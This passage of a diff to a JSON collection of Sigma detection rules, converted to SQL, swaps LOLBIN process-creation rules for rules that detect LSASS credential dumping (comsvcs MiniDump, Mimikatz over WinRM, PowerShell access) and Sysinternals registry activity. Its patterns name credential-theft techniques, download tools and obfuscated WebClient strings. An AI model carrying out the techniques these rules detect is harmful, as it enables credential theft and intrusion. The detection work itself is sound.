"attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_lolbin_sftp.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Use of VisualUiaVerifyNative.exe", - "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", - "status": "experimental", - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Legitimate testing of Microsoft UI parts." 
+ "Unlikely, since these tools shouldn't access lsass.exe at all" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", "status": "stable", - "description": 
"Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1047", + "attack.t1003.001", + "attack.t1059.001", "attack.lateral_movement", - "attack.t1021.003" + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "status": "experimental", - 
"description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", "attack.execution", - "attack.defense_evasion" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", - "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects execution of 
wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "PUA - Sysinternal Tool Execution - Registry", + "id": "25ffa65d-76d8-4da5-a832-3f2b0136e133", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - 
"Unknown" + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_add_pua_sysinternals_execution_via_eula.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", - "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "status": "test", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 
'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": 
"registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious Rundll32 Setupapi.dll Activity", - "id": "285b85b1-a555-4095-8652-a8a4106af63f", - "status": "test", - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "author": "Konstantin Grishchenko, oscd.community", + "title": "PUA - Sysinternals Tools Execution - Registry", + "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "status": "experimental", + "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + "Legitimate use of SysInternals tools. 
Filter the legitimate paths used in your environnement" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" + "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. 
a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' 
OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' 